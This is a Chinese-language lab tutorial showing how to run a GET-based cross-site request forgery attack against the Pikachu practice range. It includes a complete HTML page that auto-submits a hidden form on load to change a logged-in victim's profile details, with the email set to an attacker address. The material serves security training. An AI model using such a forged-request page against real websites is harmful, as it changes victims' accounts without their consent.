CSRF攻击实验pikachu靶场
时间: 2025-01-03 18:22:13 浏览: 9
### 实施CSRF攻击实验
在 `pikachu` 靶场环境中实施 CSRF 攻击实验涉及创建一个恶意网页,该页面会自动提交表单到目标网站,从而利用已登录用户的权限执行未授权的操作。
#### 准备工作环境
确保已在本地网络环境下部署好 `pikachu` 靶场服务,并能够访问所提供的URL路径。对于本案例中的GET型CSRF漏洞测试地址为:<http://192.168.146.161/pikchu-master/vul/csrf/csrfget/> 和 <http://192.168.2.151:801/pikachu/vul/csrf/csrfget/>[^1][^2]。
#### 创建恶意HTML文件
为了模拟一次真实的CSRF攻击场景,在本地计算机上新建一个简单的 HTML 文件作为攻击者控制下的页面:
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Malicious Page</title>
</head>
<body onload="document.getElementById('attackForm').submit()">
<form id="attackForm" action="http://192.168.146.161/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php" method="GET">
<input type="hidden" name="sex" value="girl"/>
<input type="hidden" name="phonenum" value="9876543210"/>
<input type="hidden" name="add" value="china"/>
<input type="hidden" name="email" value="attacker@malicious.com"/>
<input type="hidden" name="submit" value="submit"/>
</form>
</body>
</html>
```
此代码片段定义了一个隐藏的表单并设置了默认参数值,当受害者浏览这个页面时就会触发表单提交操作,进而修改受害者的个人信息设置。
#### 测试过程
让一位已经成功登录至 `pikachu` 平台上的用户打开上述构建好的恶意链接或直接加载保存下来的HTML文档。如果存在CSRF安全缺陷,则即使未经用户同意也会完成预期之外的数据更改请求。
通过这种方式可以验证目标站点是否存在跨站请求伪造的安全隐患。值得注意的是,在实际渗透测试过程中应当遵循合法合规的原则,仅针对有授权许可的目标开展此类活动。
阅读全文